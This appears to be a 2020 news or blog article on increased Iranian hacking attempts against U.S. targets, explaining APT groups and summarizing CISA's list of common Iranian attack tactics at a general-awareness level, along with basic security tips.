Iran Hack Attempts Almost Triple – Iran Has Already Hacked the U.S. At Least 4 Times – Patterns of Publicly Known Iranian Advanced Persistent Threats
The number of Iran hack attempts against targets in the United States has almost tripled. The increase in Iran hack attempts has intensified since the assassination of Iranian military leader Qasem Soleimani. Cyberattacks originating from Iran targeting government websites of all levels doubled then continued to increase.
An Iran hack may be initiated from state-sponsored hacking groups or individuals who are looking to steal money or data. Iran technical prowess has increased since 2009 and the country has a server known state-sponsored Advanced Persistent Threat groups to carry out cyberwarfare. APT hacking groups are organized hackers that are often state-sponsored cyberwarfare organizations.
Iran hack attempts against the United States have been successful before. Government targets include the U.S. Federal Depository Library Program (FDLP) website and a dam in Rye, New York. Iranian hackers target engineering companies, financial sector, energy, utilities, oil and gas industries, as well as government entities.
Cyberattacks originating from Iranian IP addresses targeting federal, state, and local government websites have doubled according to American web infrastructure and website security company Cloudflare. In just two days, the Iran hack attempts on targets globally, has now increased to almost triple their former rate.
Iran has a history of attacking targets in the United States and across the globe. Although their repertoire of cyberattacks does not show to skill level of hackers from China and Russia, they can still cause damage, even if it is sometimes a symbolic nuisance.
- US DHS Warns Iranian Cyberattack Could Damage Critical Infrastructure
- Cyberwarfare with Iran – DHS Issues National Terrorism Advisory System Bulletin
- Iranian Hacker Website Targets US Veterans with Malware
- Iranian Hackers Target LinkedIn Users with Malware Attack
- US Cyber Command Warns of Iranian Cyber Attack on MS Outlook
- US CISA and Iranian Hackers Exchange Cyber Attacks
- Citrix Breached by Iranian-backed Hackers
What is an Advanced Persistent (APT) Threat Group?
An Advanced Persistent Threat Group, known as an APT Group, is an organized hacking organization. APT groups often work at the behest of a national government to steal money to fund other activities, spy on other countries or political targets, or conduct corporate espionage. APT hacking groups are given numbers and names by cyber security researchers to rack their activities and to avoid offending the governments the APT groups work for. The names represent something the country is know for. For example, Iran APT groups are APT33, APT34, and APT 35. State sponsored APT33 is also known as Elfin, Magnallium, or Refined Kitten. Gothic Panda is a pseudonym for APT3, a Chinese APT group.
Iran Hack – How to Prepare
- Use strong password protection tool
- Use two-factor or multi-factor authentication for all online accounts
- Use biometric login for the highest protection on phones, tablets, and laptops, and computers. If your device phone or laptop is too old to support fingerprint login, the consider upgrading to a new phone or laptop
- Make sure computers, laptops, tablets, and phones have the latest software installed
- Create backups of important files, photos, and critical documents like taxes, 401K. and stock accounts
- Ensure backups are kept up-to-date
- Small business owners should ensure their websites and critical systems are backed up and accessible in case of internet connection disruptions
U.S. Government Website Defaced
During the first week of January 2020, U.S. Federal Depository Library Program (FDLP) was defaced with anti-U.S. President Trump messaging on 4 January 2020.
The Texas Department of Agriculture website and an Alabama veterans’ group were both defaced this week with an image of Iranian Commander Soleimani. The pro-Iran image was accompanied by a message stating the website was, “Hacked by Iranian hacker.” The city of Las Vegas, Nevada was attacked on 07 January 2020 and city services were temporarily shutdown. The cyber attack struck on the first day of the annual massive Computer and Electronics Show (CES). It is too soon to tell if any of these incidents were the work of state-sponsored hackers.
Iranians Tried to Hack 2020 Campaign
Microsoft disclosed that Iranians tried to hack 2020 Presidential campaign. The Iran hack attacked over 200 email accounts related to a campaign.
How Wealthy Is Iran?
Iran ranks 94th in the world by nominal GDP per capita. The United States ranks eighth. The top ten countries ranked by GDP (nominal) per capita from number one to ten, are Luxembourg, Switzerland, Macau, Norway, Iceland, Ireland, Qatar, United States, Singapore, Denmark, Australia.
Iranian APT Hacking Organizations
Cybersecurity and Infrastructure Security Agency (CISA) shared cyber security information on the history and typical profile of Iran hack attacks. The following are typical Iran hack profiles regarding publicly known Iranian Advanced Persistent Threat (APT) techniques.
10 Tactics Iranian Hackers Use to Attack the United States
According to CISA, these are ten tactics used by Iran hackers to compromise networks and computers in the United States and across the world.
- Credential Dumping – Credential dumping refers to any process of stealing account login and password information from passwords stored in plain text or with weak encryption. The passwords are then used to login and hack more computers on the same network.
- Obfuscated Files or Information – An attempt by the hacker to hide malware payloads with by compressing, archiving (zip files), splitting up, or encrypting malicious files to avoid detection by automated cyber security systems and firewalls.
- Data Compressed – Hacked data is compressed to minimize the amount of network resources used while the hacked information is being transmitted over back to the hacker’s servers. This is a move to avoid detection by networking monitoring tools.
- PowerShell – PowerShell is Microsoft’s command-line shell and associated scripting language built on the built on the .NET Framework and designed especially for system administration. PowerShell commands let you manage computers from the command line. Iranian hackers have exploited PowerShell to execute malicious code on compromised computers.
- User Execution – User Execution is when the hack depends on actions taken by a human to successfully execute or run malware. User execution may involve an email recipient clicking on a link delivered by a phishing email. The file execution may exploit a browser or application vulnerability to compromise a computer or network.
- Scripting – Hackers use scripts to speed up tasks that otherwise would have to be done manually. For example, compressing data on a machine and sending it back to the hacker. Scripts can be embedded inside malicious Microsoft Office documents as macros.
- Registry Run Keys/Startup Folder – All Windows computers have a registry key that allows software to open and execute software based on the users’ s permission level. Registry keys can be added, edited, and deleted to run legitimate and malicious apps at startup using the user’s permission levels. Malware may alter the machine’s registry so that the malware is always run at startup, making it hard to stop and remove.
- Remote File Copy – Remote file copy is the staging of malicious files from one network or computer to another.
- Spear Phishing Link – A spear phishing link is a clickable link is sent within the body of a targeted spear phishing email. The hacker relies on user execution to begin a malware download, execute a malicious script, or sends to target to a spoofed website to gather further sensitive data.
- Spear Phishing Attachment – A spear phishing attachment is a malicious file, often a MS Word document, Excel Spreadsheet, or Adobe pdf file, that executes a malicious script if the recipient of a spear phishing email is tricked into opening the attachment. The spear phishing attachment may launch a script or begin other malware downloads.